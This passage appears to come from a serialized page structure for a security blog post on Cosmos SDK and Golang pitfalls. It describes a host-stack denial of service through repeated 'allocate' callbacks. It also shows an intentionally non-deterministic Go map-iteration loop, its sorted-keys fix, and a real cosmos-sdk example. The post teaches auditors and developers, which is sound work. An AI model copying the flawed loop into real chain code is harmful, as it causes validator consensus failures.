4,81208],{"type":25,"tag":216,"props":81197,"children":81198},{"style":7375},[81199],{"type":31,"value":18290},{"type":25,"tag":216,"props":81201,"children":81202},{"style":6964},[81203],{"type":31,"value":1850},{"type":25,"tag":216,"props":81205,"children":81206},{"style":6947},[81207],{"type":31,"value":81172},{"type":25,"tag":216,"props":81209,"children":81210},{"style":6964},[81211],{"type":31,"value":7107},{"type":25,"tag":216,"props":81213,"children":81214},{"class":6922,"line":7574},[81215],{"type":25,"tag":216,"props":81216,"children":81217},{"style":6964},[81218],{"type":31,"value":7874},{"type":25,"tag":38,"props":81220,"children":81221},{},[81222,81224,81230,81232,81237],{"type":31,"value":81223},"As users have complete control over ",{"type":25,"tag":82,"props":81225,"children":81227},{"className":81226},[],[81228],{"type":31,"value":81229},"allocate",{"type":31,"value":81231},", there is a possibility to call back ",{"type":25,"tag":82,"props":81233,"children":81235},{"className":81234},[],[81236],{"type":31,"value":80692},{"type":31,"value":81238}," repeatedly through other imported functions. This can result in the depletion of the host stack and ultimately lead to a DoS.",{"type":25,"tag":38,"props":81240,"children":81241},{},[81242,81244,81251],{"type":31,"value":81243},"Additional real-world examples include ",{"type":25,"tag":162,"props":81245,"children":81248},{"href":81246,"rel":81247},"https://github.com/cosmos/cosmos-sdk/issues/16676",[166],[81249],{"type":31,"value":81250},"not returning proper values for malformed txs",{"type":31,"value":179},{"type":25,"tag":26,"props":81253,"children":81255},{"id":81254},"order-was-the-dream-of-man",[81256],{"type":31,"value":81257},"Order Was the Dream of Man",{"type":25,"tag":38,"props":81259,"children":81260},{},[81261],{"type":31,"value":81262},"Different from solidity, which is a domain-specific language for smart contracts, Golang is not. Therefore, developers must be mindful of specific footguns. One notable instance is non-determinism.",{"type":25,"tag":38,"props":81264,"children":81265},{},[81266],{"type":31,"value":81267},"Consider a scenario where there is a requirement to emit an event for every entry in a map. It might be tempting to implement this as demonstrated below:",{"type":25,"tag":206,"props":81269,"children":81271},{"code":81270,"language":80136,"meta":7,"className":80137,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n    for key, value := range objectMap {\n        ctx.EventManager.EmitEvent(\n            sdk.NewEvent(\n                \"MapContext\",\n                sdk.NewAttribute(key, value),\n            )\n        )\n    }\n}\n",[81272],{"type":25,"tag":82,"props":81273,"children":81274},{"__ignoreMap":7},[81275,81308,81315,81344,81381,81410,81431,81443,81480,81488,81495,81502],{"type":25,"tag":216,"props":81276,"children":81277},{"class":6922,"line":6923},[81278,81282,81287,81291,81295,81299,81303],{"type":25,"tag":216,"props":81279,"children":81280},{"style":6936},[81281],{"type":31,"value":36719},{"type":25,"tag":216,"props":81283,"children":81284},{"style":7375},[81285],{"type":31,"value":81286}," ObjectMap",{"type":25,"tag":216,"props":81288,"children":81289},{"style":6936},[81290],{"type":31,"value":53637},{"type":25,"tag":216,"props":81292,"children":81293},{"style":6964},[81294],{"type":31,"value":7701},{"type":25,"tag":216,"props":81296,"children":81297},{"style":7375},[81298],{"type":31,"value":33627},{"type":25,"tag":216,"props":81300,"children":81301},{"style":6964},[81302],{"type":31,"value":19368},{"type":25,"tag":216,"props":81304,"children":81305},{"style":7375},[81306],{"type":31,"value":81307},"string\n",{"type":25,"tag":216,"props":81309,"children":81310},{"class":6922,"line":6769},[81311],{"type":25,"tag":216,"props":81312,"children":81313},{"emptyLinePlaceholder":16},[81314],{"type":31,"value":7642},{"type":25,"tag":216,"props":81316,"children":81317},{"class":6922,"line":6778},[81318,81322,81327,81331,81336,81340],{"type":25,"tag":216,"props":81319,"children":81320},{"style":6936},[81321],{"type":31,"value":80272},{"type":25,"tag":216,"props":81323,"children":81324},{"style":7047},[81325],{"type":31,"value":81326}," EmitEntries",{"type":25,"tag":216,"props":81328,"children":81329},{"style":6964},[81330],{"type":31,"value":1850},{"type":25,"tag":216,"props":81332,"children":81333},{"style":6947},[81334],{"type":31,"value":81335},"objectMap",{"type":25,"tag":216,"props":81337,"children":81338},{"style":7375},[81339],{"type":31,"value":81286},{"type":25,"tag":216,"props":81341,"children":81342},{"style":6964},[81343],{"type":31,"value":18761},{"type":25,"tag":216,"props":81345,"children":81346},{"class":6922,"line":7005},[81347,81351,81355,81359,81363,81367,81372,81377],{"type":25,"tag":216,"props":81348,"children":81349},{"style":6973},[81350],{"type":31,"value":6976},{"type":25,"tag":216,"props":81352,"children":81353},{"style":6947},[81354],{"type":31,"value":9883},{"type":25,"tag":216,"props":81356,"children":81357},{"style":6964},[81358],{"type":31,"value":7026},{"type":25,"tag":216,"props":81360,"children":81361},{"style":6947},[81362],{"type":31,"value":43115},{"type":25,"tag":216,"props":81364,"children":81365},{"style":6953},[81366],{"type":31,"value":80388},{"type":25,"tag":216,"props":81368,"children":81369},{"style":6973},[81370],{"type":31,"value":81371}," range",{"type":25,"tag":216,"props":81373,"children":81374},{"style":6947},[81375],{"type":31,"value":81376}," objectMap",{"type":25,"tag":216,"props":81378,"children":81379},{"style":6964},[81380],{"type":31,"value":7241},{"type":25,"tag":216,"props":81382,"children":81383},{"class":6922,"line":7110},[81384,81388,81392,81397,81401,81406],{"type":25,"tag":216,"props":81385,"children":81386},{"style":6947},[81387],{"type":31,"value":30144},{"type":25,"tag":216,"props":81389,"children":81390},{"style":6964},[81391],{"type":31,"value":179},{"type":25,"tag":216,"props":81393,"children":81394},{"style":6947},[81395],{"type":31,"value":81396},"EventManager",{"type":25,"tag":216,"props":81398,"children":81399},{"style":6964},[81400],{"type":31,"value":179},{"type":25,"tag":216,"props":81402,"children":81403},{"style":7047},[81404],{"type":31,"value":81405},"EmitEvent",{"type":25,"tag":216,"props":81407,"children":81408},{"style":6964},[81409],{"type":31,"value":7420},{"type":25,"tag":216,"props":81411,"children":81412},{"class":6922,"line":7216},[81413,81418,81422,81427],{"type":25,"tag":216,"props":81414,"children":81415},{"style":6947},[81416],{"type":31,"value":81417},"            sdk",{"type":25,"tag":216,"props":81419,"children":81420},{"style":6964},[81421],{"type":31,"value":179},{"type":25,"tag":216,"props":81423,"children":81424},{"style":7047},[81425],{"type":31,"value":81426},"NewEvent",{"type":25,"tag":216,"props":81428,"children":81429},{"style":6964},[81430],{"type":31,"value":7420},{"type":25,"tag":216,"props":81432,"children":81433},{"class":6922,"line":7244},[81434,81439],{"type":25,"tag":216,"props":81435,"children":81436},{"style":8205},[81437],{"type":31,"value":81438},"                \"MapContext\"",{"type":25,"tag":216,"props":81440,"children":81441},{"style":6964},[81442],{"type":31,"value":7465},{"type":25,"tag":216,"props":81444,"children":81445},{"class":6922,"line":7257},[81446,81451,81455,81460,81464,81468,81472,81476],{"type":25,"tag":216,"props":81447,"children":81448},{"style":6947},[81449],{"type":31,"value":81450},"                sdk",{"type":25,"tag":216,"props":81452,"children":81453},{"style":6964},[81454],{"type":31,"value":179},{"type":25,"tag":216,"props":81456,"children":81457},{"style":7047},[81458],{"type":31,"value":81459},"NewAttribute",{"type":25,"tag":216,"props":81461,"children":81462},{"style":6964},[81463],{"type":31,"value":1850},{"type":25,"tag":216,"props":81465,"children":81466},{"style":6947},[81467],{"type":31,"value":76126},{"type":25,"tag":216,"props":81469,"children":81470},{"style":6964},[81471],{"type":31,"value":7026},{"type":25,"tag":216,"props":81473,"children":81474},{"style":6947},[81475],{"type":31,"value":43115},{"type":25,"tag":216,"props":81477,"children":81478},{"style":6964},[81479],{"type":31,"value":10688},{"type":25,"tag":216,"props":81481,"children":81482},{"class":6922,"line":7275},[81483],{"type":25,"tag":216,"props":81484,"children":81485},{"style":6964},[81486],{"type":31,"value":81487},"            )\n",{"type":25,"tag":216,"props":81489,"children":81490},{"class":6922,"line":7296},[81491],{"type":25,"tag":216,"props":81492,"children":81493},{"style":6964},[81494],{"type":31,"value":72290},{"type":25,"tag":216,"props":81496,"children":81497},{"class":6922,"line":7305},[81498],{"type":25,"tag":216,"props":81499,"children":81500},{"style":6964},[81501],{"type":31,"value":7311},{"type":25,"tag":216,"props":81503,"children":81504},{"class":6922,"line":7557},[81505],{"type":25,"tag":216,"props":81506,"children":81507},{"style":6964},[81508],{"type":31,"value":7874},{"type":25,"tag":38,"props":81510,"children":81511},{},[81512],{"type":31,"value":81513},"It's important to note that Golang map iterators are unordered by design. As stated below in the Golang documentation citation, running the same code with different validators may result in varying event orders, potentially causing consensus problems.",{"type":25,"tag":34,"props":81515,"children":81516},{},[81517],{"type":25,"tag":38,"props":81518,"children":81519},{},[81520],{"type":31,"value":81521},"When iterating over a map with a range loop, the iteration order is not specified and is not guaranteed to be the same from one iteration to the next.",{"type":25,"tag":38,"props":81523,"children":81524},{},[81525,81527,81532],{"type":31,"value":81526},"To correctly implement iteration orders, developers must explicitly sort the keys of the ",{"type":25,"tag":82,"props":81528,"children":81530},{"className":81529},[],[81531],{"type":31,"value":71071},{"type":31,"value":81533}," and then fetch the values using the sorted key array before emitting them.",{"type":25,"tag":206,"props":81535,"children":81537},{"code":81536,"language":80136,"meta":7,"className":80137,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n    var keys []string\n    for key := range objectMap {\n        keys = append(keys, key)\n    }\n    sort.Strings(keys)\n\n    for _, key := range keys {\n        ctx.EventManager.EmitEvent(\n            sdk.NewEvent(\n                \"MapContext\",\n                sdk.NewAttribute(key, objectMap[key]),\n            )\n        )\n    }\n}\n",[81538],{"type":25,"tag":82,"props":81539,"children":81540},{"__ignoreMap":7},[81541,81572,81579,81606,81626,81653,81689,81696,81725,81732,81767,81794,81813,81824,81868,81875,81882,81889],{"type":25,"tag":216,"props":81542,"children":81543},{"class":6922,"line":6923},[81544,81548,81552,81556,81560,81564,81568],{"type":25,"tag":216,"props":81545,"children":81546},{"style":6936},[81547],{"type":31,"value":36719},{"type":25,"tag":216,"props":81549,"children":81550},{"style":7375},[81551],{"type":31,"value":81286},{"type":25,"tag":216,"props":81553,"children":81554},{"style":6936},[81555],{"type":31,"value":53637},{"type":25,"tag":216,"props":81557,"children":81558},{"style":6964},[81559],{"type":31,"value":7701},{"type":25,"tag":216,"props":81561,"children":81562},{"style":7375},[81563],{"type":31,"value":33627},{"type":25,"tag":216,"props":81565,"children":81566},{"style":6964},[81567],{"type":31,"value":19368},{"type":25,"tag":216,"props":81569,"children":81570},{"style":7375},[81571],{"type":31,"value":81307},{"type":25,"tag":216,"props":81573,"children":81574},{"class":6922,"line":6769},[81575],{"type":25,"tag":216,"props":81576,"children":81577},{"emptyLinePlaceholder":16},[81578],{"type":31,"value":7642},{"type":25,"tag":216,"props":81580,"children":81581},{"class":6922,"line":6778},[81582,81586,81590,81594,81598,81602],{"type":25,"tag":216,"props":81583,"children":81584},{"style":6936},[81585],{"type":31,"value":80272},{"type":25,"tag":216,"props":81587,"children":81588},{"style":7047},[81589],{"type":31,"value":81326},{"type":25,"tag":216,"props":81591,"children":81592},{"style":6964},[81593],{"type":31,"value":1850},{"type":25,"tag":216,"props":81595,"children":81596},{"style":6947},[81597],{"type":31,"value":81335},{"type":25,"tag":216,"props":81599,"children":81600},{"style":7375},[81601],{"type":31,"value":81286},{"type":25,"tag":216,"props":81603,"children":81604},{"style":6964},[81605],{"type":31,"value":18761},{"type":25,"tag":216,"props":81607,"children":81608},{"class":6922,"line":7005},[81609,81614,81618,81622],{"type":25,"tag":216,"props":81610,"children":81611},{"style":6936},[81612],{"type":31,"value":81613},"    var",{"type":25,"tag":216,"props":81615,"children":81616},{"style":6947},[81617],{"type":31,"value":25340},{"type":25,"tag":216,"props":81619,"children":81620},{"style":6964},[81621],{"type":31,"value":80199},{"type":25,"tag":216,"props":81623,"children":81624},{"style":7375},[81625],{"type":31,"value":81307},{"type":25,"tag":216,"props":81627,"children":81628},{"class":6922,"line":7110},[81629,81633,81637,81641,81645,81649],{"type":25,"tag":216,"props":81630,"children":81631},{"style":6973},[81632],{"type":31,"value":6976},{"type":25,"tag":216,"props":81634,"children":81635},{"style":6947},[81636],{"type":31,"value":9883},{"type":25,"tag":216,"props":81638,"children":81639},{"style":6953},[81640],{"type":31,"value":80388},{"type":25,"tag":216,"props":81642,"children":81643},{"style":6973},[81644],{"type":31,"value":81371},{"type":25,"tag":216,"props":81646,"children":81647},{"style":6947},[81648],{"type":31,"value":81376},{"type":25,"tag":216,"props":81650,"children":81651},{"style":6964},[81652],{"type":31,"value":7241},{"type":25,"tag":216,"props":81654,"children":81655},{"class":6922,"line":7216},[81656,81660,81664,81669,81673,81677,81681,81685],{"type":25,"tag":216,"props":81657,"children":81658},{"style":6947},[81659],{"type":31,"value":29289},{"type":25,"tag":216,"props":81661,"children":81662},{"style":6953},[81663],{"type":31,"value":6956},{"type":25,"tag":216,"props":81665,"children":81666},{"style":7047},[81667],{"type":31,"value":81668}," append",{"type":25,"tag":216,"props":81670,"children":81671},{"style":6964},[81672],{"type":31,"value":1850},{"type":25,"tag":216,"props":81674,"children":81675},{"style":6947},[81676],{"type":31,"value":24943},{"type":25,"tag":216,"props":81678,"children":81679},{"style":6964},[81680],{"type":31,"value":7026},{"type":25,"tag":216,"props":81682,"children":81683},{"style":6947},[81684],{"type":31,"value":76126},{"type":25,"tag":216,"props":81686,"children":81687},{"style":6964},[81688],{"type":31,"value":7107},{"type":25,"tag":216,"props":81690,"children":81691},{"class":6922,"line":7244},[81692],{"type":25,"tag":216,"props":81693,"children":81694},{"style":6964},[81695],{"type":31,"value":7311},{"type":25,"tag":216,"props":81697,"children":81698},{"class":6922,"line":7257},[81699,81704,81708,81713,81717,81721],{"type":25,"tag":216,"props":81700,"children":81701},{"style":6947},[81702],{"type":31,"value":81703},"    sort",{"type":25,"tag":216,"props":81705,"children":81706},{"style":6964},[81707],{"type":31,"value":179},{"type":25,"tag":216,"props":81709,"children":81710},{"style":7047},[81711],{"type":31,"value":81712},"Strings",{"type":25,"tag":216,"props":81714,"children":81715},{"style":6964},[81716],{"type":31,"value":1850},{"type":25,"tag":216,"props":81718,"children":81719},{"style":6947},[81720],{"type":31,"value":24943},{"type":25,"tag":216,"props":81722,"children":81723},{"style":6964},[81724],{"type":31,"value":7107},{"type":25,"tag":216,"props":81726,"children":81727},{"class":6922,"line":7275},[81728],{"type":25,"tag":216,"props":81729,"children":81730},{"emptyLinePlaceholder":16},[81731],{"type":31,"value":7642},{"type":25,"tag":216,"props":81733,"children":81734},{"class":6922,"line":7296},[81735,81739,81743,81747,81751,81755,81759,81763],{"type":25,"tag":216,"props":81736,"children":81737},{"style":6973},[81738],{"type":31,"value":6976},{"type":25,"tag":216,"props":81740,"children":81741},{"style":6947},[81742],{"type":31,"value":6981},{"type":25,"tag":216,"props":81744,"children":81745},{"style":6964},[81746],{"type":31,"value":7026},{"type":25,"tag":216,"props":81748,"children":81749},{"style":6947},[81750],{"type":31,"value":76126},{"type":25,"tag":216,"props":81752,"children":81753},{"style":6953},[81754],{"type":31,"value":80388},{"type":25,"tag":216,"props":81756,"children":81757},{"style":6973},[81758],{"type":31,"value":81371},{"type":25,"tag":216,"props":81760,"children":81761},{"style":6947},[81762],{"type":31,"value":25340},{"type":25,"tag":216,"props":81764,"children":81765},{"style":6964},[81766],{"type":31,"value":7241},{"type":25,"tag":216,"props":81768,"children":81769},{"class":6922,"line":7305},[81770,81774,81778,81782,81786,81790],{"type":25,"tag":216,"props":81771,"children":81772},{"style":6947},[81773],{"type":31,"value":30144},{"type":25,"tag":216,"props":81775,"children":81776},{"style":6964},[81777],{"type":31,"value":179},{"type":25,"tag":216,"props":81779,"children":81780},{"style":6947},[81781],{"type":31,"value":81396},{"type":25,"tag":216,"props":81783,"children":81784},{"style":6964},[81785],{"type":31,"value":179},{"type":25,"tag":216,"props":81787,"children":81788},{"style":7047},[81789],{"type":31,"value":81405},{"type":25,"tag":216,"props":81791,"children":81792},{"style":6964},[81793],{"type":31,"value":7420},{"type":25,"tag":216,"props":81795,"children":81796},{"class":6922,"line":7557},[81797,81801,81805,81809],{"type":25,"tag":216,"props":81798,"children":81799},{"style":6947},[81800],{"type":31,"value":81417},{"type":25,"tag":216,"props":81802,"children":81803},{"style":6964},[81804],{"type":31,"value":179},{"type":25,"tag":216,"props":81806,"children":81807},{"style":7047},[81808],{"type":31,"value":81426},{"type":25,"tag":216,"props":81810,"children":81811},{"style":6964},[81812],{"type":31,"value":7420},{"type":25,"tag":216,"props":81814,"children":81815},{"class":6922,"line":7574},[81816,81820],{"type":25,"tag":216,"props":81817,"children":81818},{"style":8205},[81819],{"type":31,"value":81438},{"type":25,"tag":216,"props":81821,"children":81822},{"style":6964},[81823],{"type":31,"value":7465},{"type":25,"tag":216,"props":81825,"children":81826},{"class":6922,"line":7591},[81827,81831,81835,81839,81843,81847,81851,81855,81859,81863],{"type":25,"tag":216,"props":81828,"children":81829},{"style":6947},[81830],{"type":31,"value":81450},{"type":25,"tag":216,"props":81832,"children":81833},{"style":6964},[81834],{"type":31,"value":179},{"type":25,"tag":216,"props":81836,"children":81837},{"style":7047},[81838],{"type":31,"value":81459},{"type":25,"tag":216,"props":81840,"children":81841},{"style":6964},[81842],{"type":31,"value":1850},{"type":25,"tag":216,"props":81844,"children":81845},{"style":6947},[81846],{"type":31,"value":76126},{"type":25,"tag":216,"props":81848,"children":81849},{"style":6964},[81850],{"type":31,"value":7026},{"type":25,"tag":216,"props":81852,"children":81853},{"style":6947},[81854],{"type":31,"value":81335},{"type":25,"tag":216,"props":81856,"children":81857},{"style":6964},[81858],{"type":31,"value":7701},{"type":25,"tag":216,"props":81860,"children":81861},{"style":6947},[81862],{"type":31,"value":76126},{"type":25,"tag":216,"props":81864,"children":81865},{"style":6964},[81866],{"type":31,"value":81867},"]),\n",{"type":25,"tag":216,"props":81869,"children":81870},{"class":6922,"line":7604},[81871],{"type":25,"tag":216,"props":81872,"children":81873},{"style":6964},[81874],{"type":31,"value":81487},{"type":25,"tag":216,"props":81876,"children":81877},{"class":6922,"line":7613},[81878],{"type":25,"tag":216,"props":81879,"children":81880},{"style":6964},[81881],{"type":31,"value":72290},{"type":25,"tag":216,"props":81883,"children":81884},{"class":6922,"line":7636},[81885],{"type":25,"tag":216,"props":81886,"children":81887},{"style":6964},[81888],{"type":31,"value":7311},{"type":25,"tag":216,"props":81890,"children":81891},{"class":6922,"line":7645},[81892],{"type":25,"tag":216,"props":81893,"children":81894},{"style":6964},[81895],{"type":31,"value":7874},{"type":25,"tag":38,"props":81897,"children":81898},{},[81899],{"type":31,"value":81900},"The combination of hidden code within external Golang dependencies makes it difficult to avoid language-wise quirks fully. It is crucial to remain vigilant and avoid underestimating the gravity of this lingering bug class.",{"type":25,"tag":606,"props":81902,"children":81904},{"id":81903},"real-world-examples-1",[81905],{"type":31,"value":80661},{"type":25,"tag":38,"props":81907,"children":81908},{},[81909,81911,81916,81918,81924,81926,81932,81934,81940],{"type":31,"value":81910},"Real-world examples of ",{"type":25,"tag":82,"props":81912,"children":81914},{"className":81913},[],[81915],{"type":31,"value":71071},{"type":31,"value":81917}," causing determinism problems can be found ",{"type":25,"tag":162,"props":81919,"children":81922},{"href":81920,"rel":81921},"https://github.com/cosmos/cosmos-sdk/pull/12487",[166],[81923],{"type":31,"value":51553},{"type":31,"value":81925},", specifically, where the result of ",{"type":25,"tag":82,"props":81927,"children":81929},{"className":81928},[],[81930],{"type":31,"value":81931},"buildCommitInfo",{"type":31,"value":81933}," is inconsistent due to iteration over the ",{"type":25,"tag":82,"props":81935,"children":81937},{"className":81936},[],[81938],{"type":31,"value":81939},"rs.stores",{"type":31,"value":81941}," map.",{"type":25,"tag":38,"props":81943,"children":81944},{},[81945],{"type":25,"tag":162,"props":81946,"children":81949},{"href":81947,"rel":81948},"https://github.com/cosmos/cosmos-sdk/blob/55054282d2df794d9a5fe2599ea25473379ebc3d/store/rootmulti/store.go#L909",[166],[81950],{"type":31,"value":80711},{"type":25,"tag":206,"props":81952,"children":81954},{"code":81953,"language":80136,"meta":7,"className":80137,"style":7},"func (rs *Store) buildCommitInfo(\n    version int64\n) *types.CommitInfo {\n    storeInfos := []types.StoreInfo{}\n    for key, store := range rs.stores {\n        if store.GetStoreType() == types.StoreTypeTransient {\n            continue\n        }\n        storeInfos = append(storeInfos, types.StoreInfo{\n            Name:     key.Name(),\n            CommitId: store.LastCommitID(),\n        })\n    }\n    return &types.CommitInfo{\n        Version:    version,\n        StoreInfos: storeInfos,\n    }\n}\n",[81955],{"type":25,"tag":82,"props":81956,"children":81957},{"__ignoreMap":7},[81958,81995,82008,82036,82070,82115,82161,82169,82176,82221,82251,82280,82287,82294,82321,82343,82363,82370],{"type":25,"tag":216,"props":81959,"children":81960},{"class":6922,"line":6923},[81961,81965,81969,81974,81978,81983,81987,81991],{"type":25,"tag":216,"props":81962,"children":81963},{"style":6936},[81964],{"type":31,"value":80272},{"type":25,"tag":216,"props":81966,"children":81967},{"style":6964},[81968],{"type":31,"value":7016},{"type":25,"tag":216,"props":81970,"children":81971},{"style":6947},[81972],{"type":31,"value":81973},"rs ",{"type":25,"tag":216,"props":81975,"children":81976},{"style":6953},[81977],{"type":31,"value":8519},{"type":25,"tag":216,"props":81979,"children":81980},{"style":7375},[81981],{"type":31,"value":81982},"Store",{"type":25,"tag":216,"props":81984,"children":81985},{"style":6964},[81986],{"type":31,"value":7036},{"type":25,"tag":216,"props":81988,"children":81989},{"style":7047},[81990],{"type":31,"value":81931},{"type":25,"tag":216,"props":81992,"children":81993},{"style":6964},[81994],{"type":31,"value":7420},{"type":25,"tag":216,"props":81996,"children":81997},{"class":6922,"line":6769},[81998,82003],{"type":25,"tag":216,"props":81999,"children":82000},{"style":6947},[82001],{"type":31,"value":82002},"    version",{"type":25,"tag":216,"props":82004,"children":82005},{"style":7375},[82006],{"type":31,"value":82007}," int64\n",{"type":25,"tag":216,"props":82009,"children":82010},{"class":6922,"line":6778},[82011,82015,82019,82023,82027,82032],{"type":25,"tag":216,"props":82012,"children":82013},{"style":6964},[82014],{"type":31,"value":7036},{"type":25,"tag":216,"props":82016,"children":82017},{"style":6953},[82018],{"type":31,"value":8519},{"type":25,"tag":216,"props":82020,"children":82021},{"style":7375},[82022],{"type":31,"value":9709},{"type":25,"tag":216,"props":82024,"children":82025},{"style":6964},[82026],{"type":31,"value":179},{"type":25,"tag":216,"props":82028,"children":82029},{"style":7375},[82030],{"type":31,"value":82031},"CommitInfo",{"type":25,"tag":216,"props":82033,"children":82034},{"style":6964},[82035],{"type":31,"value":7241},{"type":25,"tag":216,"props":82037,"children":82038},{"class":6922,"line":7005},[82039,82044,82048,82052,82056,82060,82065],{"type":25,"tag":216,"props":82040,"children":82041},{"style":6947},[82042],{"type":31,"value":82043},"    storeInfos",{"type":25,"tag":216,"props":82045,"children":82046},{"style":6953},[82047],{"type":31,"value":80388},{"type":25,"tag":216,"props":82049,"children":82050},{"style":6964},[82051],{"type":31,"value":80199},{"type":25,"tag":216,"props":82053,"children":82054},{"style":7375},[82055],{"type":31,"value":9709},{"type":25,"tag":216,"props":82057,"children":82058},{"style":6964},[82059],{"type":31,"value":179},{"type":25,"tag":216,"props":82061,"children":82062},{"style":7375},[82063],{"type":31,"value":82064},"StoreInfo",{"type":25,"tag":216,"props":82066,"children":82067},{"style":6964},[82068],{"type":31,"value":82069},"{}\n",{"type":25,"tag":216,"props":82071,"children":82072},{"class":6922,"line":7110},[82073,82077,82081,82085,82089,82093,82097,82102,82106,82111],{"type":25,"tag":216,"props":82074,"children":82075},{"style":6973},[82076],{"type":31,"value":6976},{"type":25,"tag":216,"props":82078,"children":82079},{"style":6947},[82080],{"type":31,"value":9883},{"type":25,"tag":216,"props":82082,"children":82083},{"style":6964},[82084],{"type":31,"value":7026},{"type":25,"tag":216,"props":82086,"children":82087},{"style":6947},[82088],{"type":31,"value":9892},{"type":25,"tag":216,"props":82090,"children":82091},{"style":6953},[82092],{"type":31,"value":80388},{"type":25,"tag":216,"props":82094,"children":82095},{"style":6973},[82096],{"type":31,"value":81371},{"type":25,"tag":216,"props":82098,"children":82099},{"style":6947},[82100],{"type":31,"value":82101}," rs",{"type":25,"tag":216,"props":82103,"children":82104},{"style":6964},[82105],{"type":31,"value":179},{"type":25,"tag":216,"props":82107,"children":82108},{"style":6947},[82109],{"type":31,"value":82110},"stores",{"type":25,"tag":216,"props":82112,"children":82113},{"style":6964},[82114],{"type":31,"value":7241},{"type":25,"tag":216,"props":82116,"children":82117},{"class":6922,"line":7216},[82118,82122,82126,82130,82135,82139,82143,82148,82152,82157],{"type":25,"tag":216,"props":82119,"children":82120},{"style":6973},[82121],{"type":31,"value":7222},{"type":25,"tag":216,"props":82123,"children":82124},{"style":6947},[82125],{"type":31,"value":9782},{"type":25,"tag":216,"props":82127,"children":82128},{"style":6964},[82129],{"type":31,"value":179},{"type":25,"tag":216,"props":82131,"children":82132},{"style":7047},[82133],{"type":31,"value":82134},"GetStoreType",{"type":25,"tag":216,"props":82136,"children":82137},{"style":6964},[82138],{"type":31,"value":18000},{"type":25,"tag":216,"props":82140,"children":82141},{"style":6953},[82142],{"type":31,"value":12528},{"type":25,"tag":216,"props":82144,"children":82145},{"style":6947},[82146],{"type":31,"value":82147}," types",{"type":25,"tag":216,"props":82149,"children":82150},{"style":6964},[82151],{"type":31,"value":179},{"type":25,"tag":216,"props":82153,"children":82154},{"style":6947},[82155],{"type":31,"value":82156},"StoreTypeTransient",{"type":25,"tag":216,"props":82158,"children":82159},{"style":6964},[82160],{"type":31,"value":7241},{"type":25,"tag":216,"props":82162,"children":82163},{"class":6922,"line":7244},[82164],{"type":25,"tag":216,"props":82165,"children":82166},{"style":6973},[82167],{"type":31,"value":82168},"            continue\n",{"type":25,"tag":216,"props":82170,"children":82171},{"class":6922,"line":7257},[82172],{"type":25,"tag":216,"props":82173,"children":82174},{"style":6964},[82175],{"type":31,"value":7302},{"type":25,"tag":216,"props":82177,"children":82178},{"class":6922,"line":7275},[82179,82184,82188,82192,82196,82201,82205,82209,82213,82217],{"type":25,"tag":216,"props":82180,"children":82181},{"style":6947},[82182],{"type":31,"value":82183},"        storeInfos",{"type":25,"tag":216,"props":82185,"children":82186},{"style":6953},[82187],{"type":31,"value":6956},{"type":25,"tag":216,"props":82189,"children":82190},{"style":7047},[82191],{"type":31,"value":81668},{"type":25,"tag":216,"props":82193,"children":82194},{"style":6964},[82195],{"type":31,"value":1850},{"type":25,"tag":216,"props":82197,"children":82198},{"style":6947},[82199],{"type":31,"value":82200},"storeInfos",{"type":25,"tag":216,"props":82202,"children":82203},{"style":6964},[82204],{"type":31,"value":7026},{"type":25,"tag":216,"props":82206,"children":82207},{"style":7375},[82208],{"type":31,"value":9709},{"type":25,"tag":216,"props":82210,"children":82211},{"style":6964},[82212],{"type":31,"value":179},{"type":25,"tag":216,"props":82214,"children":82215},{"style":7375},[82216],{"type":31,"value":82064},{"type":25,"tag":216,"props":82218,"children":82219},{"style":6964},[82220],{"type":31,"value":14836},{"type":25,"tag":216,"props":82222,"children":82223},{"class":6922,"line":7296},[82224,82229,82234,82238,82242,82247],{"type":25,"tag":216,"props":82225,"children":82226},{"style":6947},[82227],{"type":31,"value":82228},"            Name",{"type":25,"tag":216,"props":82230,"children":82231},{"style":6964},[82232],{"type":31,"value":82233},":     ",{"type":25,"tag":216,"props":82235,"children":82236},{"style":6947},[82237],{"type":31,"value":76126},{"type":25,"tag":216,"props":82239,"children":82240},{"style":6964},[82241],{"type":31,"value":179},{"type":25,"tag":216,"props":82243,"children":82244},{"style":7047},[82245],{"type":31,"value":82246},"Name",{"type":25,"tag":216,"props":82248,"children":82249},{"style":6964},[82250],{"type":31,"value":7448},{"type":25,"tag":216,"props":82252,"children":82253},{"class":6922,"line":7305},[82254,82259,82263,82267,82271,82276],{"type":25,"tag":216,"props":82255,"children":82256},{"style":6947},[82257],{"type":31,"value":82258},"            CommitId",{"type":25,"tag":216,"props":82260,"children":82261},{"style":6964},[82262],{"type":31,"value":19288},{"type":25,"tag":216,"props":82264,"children":82265},{"style":6947},[82266],{"type":31,"value":9892},{"type":25,"tag":216,"props":82268,"children":82269},{"style":6964},[82270],{"type":31,"value":179},{"type":25,"tag":216,"props":82272,"children":82273},{"style":7047},[82274],{"type":31,"value":82275},"LastCommitID",{"type":25,"tag":216,"props":82277,"children":82278},{"style":6964},[82279],{"type":31,"value":7448},{"type":25,"tag":216,"props":82281,"children":82282},{"class":6922,"line":7557},[82283],{"type":25,"tag":216,"props":82284,"children":82285},{"style":6964},[82286],{"type":31,"value":72167},{"type":25,"tag":216,"props":82288,"children":82289},{"class":6922,"line":7574},[82290],{"type":25,"tag":216,"props":82291,"children":82292},{"style":6964},[82293],{"type":31,"value":7311},{"type":25,"tag":216,"props":82295,"children":82296},{"class":6922,"line":7591},[82297,82301,82305,82309,82313,82317],{"type":25,"tag":216,"props":82298,"children":82299},{"style":6973},[82300],{"type":31,"value":20947},{"type":25,"tag":216,"props":82302,"children":82303},{"style":6953},[82304],{"type":31,"value":11093},{"type":25,"tag":216,"props":82306,"children":82307},{"style":7375},[82308],{"type":31,"value":9709},{"type":25,"tag":216,"props":82310,"children":82311},{"style":6964},[82312],{"type":31,"value":179},{"type":25,"tag":216,"props":82314,"children":82315},{"style":7375},[82316],{"type":31,"value":82031},{"type":25,"tag":216,"props":82318,"children":82319},{"style":6964},[82320],{"type":31,"value":14836},{"type":25,"tag":216,"props":82322,"children":82323},{"class":6922,"line":7604},[82324,82329,82334,82339],{"type":25,"tag":216,"props":82325,"children":82326},{"style":6947},[82327],{"type":31,"value":82328},"        Version",{"type":25,"tag":216,"props":82330,"children":82331},{"style":6964},[82332],{"type":31,"value":82333},":    